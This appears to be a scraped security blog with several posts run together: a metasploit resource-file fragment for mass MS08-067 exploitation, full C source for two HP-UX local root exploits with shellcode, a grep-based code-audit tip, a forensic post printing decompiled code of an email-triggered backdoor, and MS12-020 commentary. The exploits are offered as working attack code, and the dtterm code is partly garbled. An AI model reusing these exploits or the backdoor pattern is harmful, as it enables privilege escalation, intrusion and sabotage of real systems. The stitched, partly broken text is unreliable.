Automating low hanging fruit exploitation with metasploit resource files
Low hanging fruit is most of the time the first thing as a security consultant I try, while I kick up the scanners I mostly also usually kick “extra” scans which are not full probe but only looking for specific vulnerabilities than in my experience are a quick way to go and gain enterprise administrator on the internal network.
So this time we are going to take a fairly easy example which is MS08-067 (the ever present and “will it ever die?” vulnerability) so automate it just to make the shells rain, but this can be changed for other vulnerabilities (which I will be updating and posting here)
A good thing is to be able to use ruby by using <ruby> </ruby>
I will dissect the entire resource file part by part, explain it and see a few “tricks” that I encountered to make it work:
use multi/handler setg PAYLOAD windows/meterpreter/reverse_tcp set ExitOnSession false
This just sets up the handler, payload and no ExitOnSession, nothing much and pretty standard on the resource files you can find on “them googles” next lines are:
if (framework.datastore['LHOST'] == nil )
print_error("No LHOST set, where do we get the shells? go fix (must be global so setg instead of set)")
return
end
if (framework.datastore['RHOSTS'] == nil)
print_error("RHOSTS must be set globally (pro tip: use setg instead of set)... exiting")
return
end
So this just checks that you have LHOST and RHOSTS setup, it does require the setg as it will go into the module and if not set globally the setup will just be gone, pretty simple.
Video about Trapper 1.0 from Campus Party 2010 (SSH, SMB, FTP abuse and hijack using a hydra)
I found this gorgeous thing, 4 minutes but shows what trapper is, some code of it and some examples that were done right there:
Conferencia “Trapper, de sniffer a hydra” from Jonathan Cabrera on Vimeo.
[Old Exploits] HPUX sastcpd local exploit
Another oldie but goodie! there was a shell script roaming around but thought as an exercise at that time (I can only presume honestly, it’s been a while) and have the exploit setup in a .c file instead of having shell scripts all over the place (I personally dislike having exploits on shell scripts as they might go a bit rogue on you if you are not in the correct shell like ksh or so)
So here is yet another HP-UX exploit, keeping it coming, later I will dissect every single one of them and go thru them and the techniques evolved for all the exploits I post during this week! So come back to check them out!
Again change the “stdio.h” and so forth includes into
/*
x-sastcpd.c
XyXyXyXy
To all the shit that has hit my life: "FUCK U I'LL SEE YOU IN HELL!"
*/
#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
extern char **environ;
int main(int argc, char **argv) {
char *env1, *env2;
char buffer[1024];
char *vuln;
vuln = (char *)malloc(256);
if(argc > 1) {
snprintf(vuln, 255, "%s", argv[1]);
}
else {
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(1);
}
if((env2 = getenv("HOME")) == NULL) {
fprintf(stderr, "WHAT!? NO HOME?????\n");
exit(-1);
}
fprintf(stderr, "Setting up the enviroment variable ...");
snprintf(buffer, 1024, "%s/%s", env2, argv[0]);
setenv("authprog", buffer, 1);
fprintf(stderr, "DONE\n");
if((env1 = getenv("LOCK")) == NULL) {
fprintf(stderr, "sastcpd exploit by XyXyXyXy, .sh sux, all in one nice .c\n");
setenv("LOCK", "XyXyXyXy", 0);
execve(argv[0], argv, environ);
}
else {
seteuid(0);
setuid(0);
setegid(0);
setgid(0);
execl("/sbin/sh", "/sbin/sh", NULL);
}
execl(vuln, vuln, NULL);
return 0;
}
Simple and quick … ohhh yeah! keep it classy and GIT R DUN!
[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit
Well here comes an oldie but goodie, the dtterm -display option is a very old bug, my google foo did not really show me any exploits on it (I saw some bugs about setting the DISPLAY= variable and having it crash I’ll presume is the same bug, I don’t have an HP-UX at hand and found this in a very very VERY old directory while roaming around in old HDs and thought to publish it as again I can’t find any for HP-UX.
This bug is annoyingly easy, yet so hard, at first I wanted to setup just I setup the linux exploits (more on that later) by execve() and so forth but … guess not! anyway this was around the 2000 while I was honestly still fiddling with new techniques browsing around and never publishing my exploits, I have removed the old header as it was holding an old handle :P keep the mistic going! LoL!
Due to my noobness please change the “stdio.h”, “unistd.h” and “stdlib.h” for
/*
x-dtterm-hpux.c
XXXXXXXX
"This bug is completly theoderaadtical"
*/
#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#define BUFFSIZE 3000
#define ALIGN 0
#define NOP 0x08630243
#define OFFSET 0
#define FIRSTJUMP 40
#define RETADDR 0x7b00484c
static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
long get_sp(void) {
__asm__("copy %sp,%ret0 \n");
}
int main(int argc, char **argv) {
char c0de[4096];
char *ch_ptr;
char *envy;
int aux;
unsigned long addr;
unsigned long addr2;
int align = ALIGN;
int buffsize = BUFFSIZE;
int offset = OFFSET;
unsigned long sysaddr;
if(argc > 1) align = atoi(argv[1]) * 4;
if(argc > 2) offset = atoi(argv[2]);
ch_ptr = c0de;
addr=get_sp()+offset;
addr2 = RETADDR + offset;
addr2 = c0de;
for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
*(ch_ptr++)=(NOP>>24)&255;
*(ch_ptr++)=(NOP>>16)&255;
*(ch_ptr++)=(NOP>>8)&255;
*(ch_ptr++)=NOP&255;
}
memcpy(ch_ptr, shellcode, strlen(shellcode));
ch_ptr+=strlen(shellcode);
for (aux=0; aux>24)&255;
*(ch_ptr++)=(addr>>16)&255;
*(ch_ptr++)=(addr>>8)&255;
*(ch_ptr++)=addr&255;
}
/*
for (aux=0; aux<800; aux++) {
*(ch_ptr++)=(addr2>>24)&255;
*(ch_ptr++)=(addr2>>16)&255;
*(ch_ptr++)=(addr2>>8)&255;
*(ch_ptr++)=addr2&255;
}
*/
c0de[BUFFSIZE-1]='\0';
fprintf(stderr, "return address will be %#x shellcode is at %#x\n", addr, addr2);
if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, NULL) < 0) {
fprintf(stderr, "whoa!\n");
exit(1);
}
}
Hope you like it, I have HP-UX 11.11 compiled exploit binaries, either dynamic or static. But who in his right mind would just grab a binary from someone and run it? if I can get a hold of an HP-UX 11.11 machine with gcc/cc compiler I can video the compilation, get the md5 and then upload.
Anyway back to the SUNDAY SUNDAY SUNDAY!!!
Static source code audit on terminal (AKA Glorified greps) Part 2
“Java Audit” time!!! Now this is also part on the bash functions to be able to do a VERY basic audit start on Java. This function will allow you to call it form whenever you are and you will get 3 logs inside a folder called security_logs created in the same directory from where it was called (Obviously).
The rc file defines a function called auditjava(), what will it do? it will look for “dangerous” functions, that are the usual culprits on the bugs :)
It sill create 3 files within the security_logs directory:
Static source code audit on terminal (AKA Glorified greps) Part 1
For anyone that has done a long source code audit is not about really finding the easy/low hanging fruit stuff that can be slow and sometimes a bit “frustrating”.
I recently had a nice 660,000 lines of code source code audit to be done in less than 2 weeks, the language was Java, so the first thing that was to be done (they had already hit fortify and other tools with it) and were looking for a bit of more interesting stuff apparently.
Anyway I still did my very long hanging fruit greps, this being huge I got hit with a few problems:
So I guess everything was setup and ready for it, so after running something as easy as some greps for a bunch of functions to make sure they didn’t have anything weird going on I needed logs and a decent output from everything, so ended up creating a very very simple grep:
grep -r -b #file# #directory# | awk -F : '{print "Filename: "$1"\nline: "$2"\nmatch: "$3"\n\n"}'
So this is the result of a quick call for strcpy() on an android-sdk directory as an example:
Command:
fsckOSX:~ nahual$ grep -r -b strcpy mydroid/ | grep -v "Binary file" | awk -F : '{print "Filename: "$1"\nline: "$2"\nmatch: "$3"\n\n"}' | more
Output:
Filename: mydroid/bionic/libc/Android.mk line: 3684 match: string/strcpy.c \ Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S line: 0 match: /* $OpenBSD Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S line: 186 match: .section .gnu.warning.strcpy Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S line: 216 match: .ascii "warning Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S line: 462 match: ENTRY(strcpy) Filename: mydroid/bionic/libc/bionic/realpath.c line: 2856 match: (void)strcpy(resolved, "."); Filename: mydroid/bionic/libc/bionic/realpath.c line: 4146 match: (void)strcpy(wbuf, p); Filename: mydroid/bionic/libc/bionic/system_properties.c line: 3699 match: strcpy(name, pi->name); Filename: mydroid/bionic/libc/include/string.h line: 2244 match: extern char* strcpy(char *, const char *); Filename: mydroid/bionic/libc/netbsd/nameser/ns_samedomain.c line: 4331 match: strcpy(dst, src); ... fsckOSX:~ nahual$
ms12-020 saga: PoC exploit on pastebin and online rdp vulnerability scan: rdpcheck.com
So then again, rolling and checking istherdpexploitoutyet.com found an interesting thing; they link to a PoC on pastebin, and apparently it messes up your box, I wonder how many people lost boxes on that one, but they link to another cool site rdpcheck.com they scan you back to check if you are vulnerable to RDP exploit, they even check you don’t use disposable addresses which is very interesting and cool.
So I put my gmail address and click test, I don’t have any RDP at my home address but I wanted to see how they do it with closed ports, then I’ll setup an exploitable RDP and let them scan me :) and update this post!
After you click on test you will receive something on the email like this (IP Address removed):
IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on it’s standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.
Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into an self-propagating RDP worm you’ll thank us for this advice.
Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.
Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.
Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.
From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.
Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.
This is pretty cool and useful at least for the average joe :)
I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?
[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email
I recently had to actually do a fast forensic job for a friend, he asked me some help as he was taking over some business which were “abandoned” by an “open source consultant” which is to say pretty much installs everything on linux and does half coding in this case.
The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.
First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.
The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):
fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comRhttp://www.cualesmiip.comt
divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt
fsckOSX:~ nahual$
py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):
from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser
user = 'xxxxxx'
passwd = 'xxxxxxxx'
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'
def check_locker():
try:
m = poplib.POP3_SSL('pop.gmail.com', 995)
m.user(user)
m.pass_(passwd)
except Exception, err:
print err
else:
numero = len(m.list()[1])
for i in range(numero):
(response, headerLines, bytes) = m.retr(i + 1)
mensaje = '\n'.join(headerLines)
p = Parser()
email = p.parsestr(mensaje)
subject = email['Subject']
if (subject == LOCK):
print 'bloqueando'
f = open(file_log, 'w')
f.write('')
f.close()
elif (subject == UNLOCK):
print 'desbloqueando'
f = open(file_log, 'w')
f.write('xxxxxxxxxxxxx')
f.close()
elif (subject == GETIP):
check_ip()
m.quit()
def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()
As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.
This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.
This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz
Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?
MS12-020, The saga continues: exploit code published for the RDP chinese worm leaked from Microsoft?
I was sent this link which is hilarious: http://istherdpexploitoutyet.com/
Has some really short information on the exploit and PoC and obviously who bought it (yes kids ZDI bought this one, gave it to Microsoft and then one of them managed to leak it) but apparently the original exploit code was leaked (complete article HERE)
From the article:
“Chinese hackers have released proof-of-concept code that provides a roadmap to exploit a dangerous RDP (remote desktop protocol) vulnerability that was patched by Microsoft earlier this week.
The publication of the code on a Chinese language forum heightens the urgency to apply Microsoft’s MS12-020 update, which addresses a remote, pre-authentication, network-accessible code execution vulnerability in Microsoft’s implementation of the RDP protocol.”
Well I’m not fluent on Chinese at all, BUT when I went into the website it clearly says on the top:
“0day discount
This BLOG from time to time the market of 0day of exp”
Errr I’m sorry but that does not tell ANYONE to go and patch as the article says, they actually even go further on saying: “Thanks to 360 friends to provide the EXP.” Well apparently 360 guys managed to grab that exploit which apparently has a special signature from the reseracher Luigi Auriemma (@luigi_auriemma)
That is a good practice and I hope it starts out again, watermarking the PoCs so you can see where the leak is, the interesting part is … Who is owned by the chinese? ZDI? or Microsoft? if they leaked that, which others have been leaked?
This bug will end up showing more flaws of handling them and the leaking of it’s PoC than the bug itself!
UPDATE:
On this tweet (https://twitter.com/#!/luigi_auriemma/status/180646548395401216) Luigi Auriemma confirms it was Microsoft the leak.
Luigi Auriemma @luigi_auriemma
in case isn’t clear yet: rdpclient.exe seems written by Microsoft using the original packet poc I sent to ZDI. MS is the source of the leak
His Advisory can be seen HERE
MS12-020 the new MS08-067?
From Microsoft’s support website:
MS12-020: Vulnerabilities in Remote Desktop could allow remote code execution: March 13, 2012
The interesting is that on this link (http://support.microsoft.com/kb/2671387) it says on the more information tab:
“2667402 MS12-020: Description of the security update for Terminal Server Denial of Service Vulnerability: March 13, 2012″
But then on this link (http://blogs.technet.com/b/msrc/archive/2012/03/13/strength-flexibility-and-the-march-2012-security-bulletins.aspx) they actually talk about a critical one, which means it’s exploitable, which has turned a lot of heads and wonder if this bug will end up being the new MS08-087 due to longevity on it (God knows finding that one will render Enterprise Admin or Domain Admin too quick most of the times anyway)
Let’s see how fast the guys at metasploit project (www.metasploit.com) will come up with an exploit for it!
(NOTE: Thank you so much flacman for catching the typo .. sorry!!!!)
D5 Creation